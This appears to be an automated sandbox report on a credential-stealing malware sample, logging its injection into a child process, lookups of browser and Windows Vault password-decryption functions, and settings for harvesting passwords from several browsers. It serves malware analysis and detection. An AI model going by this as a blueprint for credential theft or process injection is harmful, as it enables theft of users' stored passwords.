Get Address c:\windows\syswow64\vaultcli.dll function = VaultCloseVault, address_out = 0x70182718 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultEnumerateItems, address_out = 0x70183099 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultFree, address_out = 0x70184321 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetInformation, address_out = 0x701824c0 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetItem, address_out = 0x70183242 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Init, address_out = 0x7007d70b True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Shutdown, address_out = 0x7007d13c True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x70013c51 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_FreeSlot, address_out = 0x70013333 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_CheckUserPassword, address_out = 0x6fffcbc4 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_Authenticate, address_out = 0x6fffd3ca True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11SDR_Decrypt, address_out = 0x700100a7 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_open, address_out = 0x70121ca0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_prepare, address_out = 0x700ace70 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_step, address_out = 0x70115200 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_text, address_out = 0x700cd400 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int, address_out = 0x700cd3a0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int64, address_out = 0x700cd3d0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_finalize, address_out = 0x700f9f60 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_close, address_out = 0x700fbde0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_exec, address_out = 0x700fa270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryFullProcessImageNameW, address_out = 0x75fd15f7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessTimes, address_out = 0x75fdd60f True 1
Fn
System (1)
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 1
Fn
Ini (28)
Operation Filename Additional Information Success Count Logfile
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = FirefoxProfileFolder False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = FirefoxInstallFolder False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = ChromeProfileFolder False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = OperaPasswordFile False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = Path, data_out = Profiles/p7ap74gw.default True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = Path False 1
Fn
Read C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Fn
Process #12: syncpack_.exe
46 0
Information Value
ID #12
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:45
OS Process Information
Information Value
PID 0x834
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x8A8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x0012ffff Private Memory Readable, Writable True False False -
locale.nls 0x00130000 0x00196fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x00557fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000560000 0x00560000 0x006e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x01aeffff Pagefile Backed Memory Readable True False False -
kernel32.dll 0x777e0000 0x778fefff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x77900000 0x779f9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fffa000 0x7fffa000 0x7fffafff Private Memory Readable, Writable True False False -
syncpack_.exe 0xffab0000 0xffac5fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000140000000 0x140000000 0x14001efff Private Memory Readable, Writable, Executable True False False -
kernelbase.dll 0x7fefda00000 0x7fefda6afff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefdd20000 0x7fefdd86fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefdf20000 0x7fefdf90fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefe040000 0x7fefe242fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe4b0000 0x7fefe58afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7fefe9c0000 0x7feff747fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7feff750000 0x7feff76efff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7feff770000 0x7feff838fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7feffa40000 0x7feffb6cfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7feffb70000 0x7feffc78fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7feffcd0000 0x7feffcfdfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7feffd00000 0x7feffd0dfff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feffd20000 0x7feffd20fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x140000000, size = 126976 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7fffffd8010, size = 8 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x8a8, address = 0x0 True 1
Fn
Host Behavior
File (3)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (2)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = DLLPathEx, data = 67 True 1
Fn
Module (39)
Operation Module Additional Information Success Count Logfile
Load advapi32.dll base_address = 0x7fefe4b0000 True 1
Fn
Load ole32.dll base_address = 0x7fefe040000 True 1
Fn
Load C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x777e0000 True 1
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsAlloc, address_out = 0x777f7190 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsFree, address_out = 0x777f15b0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsGetValue, address_out = 0x77803520 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlsSetValue, address_out = 0x777fbd90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x777f79b0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateEventExW, address_out = 0x7782c590 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateSemaphoreExW, address_out = 0x7782c4c0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x777e8050 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x777e8820 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadpoolTimer, address_out = 0x77a1b2f0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x77a0d8c0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x77a0d620 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7782ba80 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadpoolWait, address_out = 0x77a1e170 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseThreadpoolWait, address_out = 0x77a0c540 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77a51f80 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x77acec60 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77a50040 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x7782b820 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x77855ad0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x7782c3d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CompareStringEx, address_out = 0x7782b980 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetDateFormatEx, address_out = 0x77870920 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetLocaleInfoEx, address_out = 0x777e3c10 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTimeFormatEx, address_out = 0x7786d4e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x7782b790 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsValidLocaleName, address_out = 0x7782b770 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LCMapStringEx, address_out = 0x7782b710 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetTickCount64, address_out = 0x777e9450 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (1)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:25 (UTC) True 1
Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #13: surtq5qk9h.exe
2275 0
Information Value
ID #13
File Name c:\programdata\surtq5qk9h.exe
Command Line "C:\ProgramData\suRtQ5QK9h.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:32, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
Information Value
PID 0x7b4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x588
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0013ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00140000 0x0017bfff Memory Mapped File Readable False False False -
~df91d880e8a18f5eb9.tmp 0x00140000 0x001bffff Memory Mapped File Readable, Writable True True False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x00271fff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x003eefff Pagefile Backed Memory Readable True False False -
surtq5qk9h.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0cdaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cdb0000 0x0cdb0000 0x0cf30fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000cf40000 0x0cf40000 0x0e33ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e340000 0x0e340000 0x0e73ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e740000 0x0ea0efff Memory Mapped File Readable False False False -
private_0x000000000ea10000 0x0ea10000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000ea10000 0x0ea10000 0x0eb2ffff Private Memory Readable, Writable True False False -
private_0x000000000eb40000 0x0eb40000 0x0eb7ffff Private Memory Readable, Writable True False False -
private_0x000000000eb90000 0x0eb90000 0x0ebcffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0ed3ffff Private Memory Readable, Writable True False False -
private_0x000000000ebd0000 0x0ebd0000 0x0eccffff Private Memory Readable, Writable True False False -
private_0x000000000ed30000 0x0ed30000 0x0ed3ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ed40000 0x0ed40000 0x0f13ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f140000 0x0f140000 0x0f532fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f540000 0x0fe6ffff Memory Mapped File Readable False False False -
private_0x000000000fe70000 0x0fe70000 0x1006ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1
SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe
False
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Get Info STD_INPUT_HANDLE type = file_type False 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type False 1
Fn
Get Info STD_ERROR_HANDLE type = file_type False 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (2)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors - False 2
Fn
Module (83)
Operation Module Additional Information Success Count Logfile
Load OLEAUT32.DLL base_address = 0x75a00000 True 1
Fn
Load SXS.DLL base_address = 0x752d0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Handle c:\programdata\surtq5qk9h.exe base_address = 0x400000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75a00000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75be0000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x771c0000 True 1
Fn
Get Filename - process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 3
Fn
Get Filename - process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 3
Fn
Get Filename c:\programdata\surtq5qk9h.exe process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsTNT, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
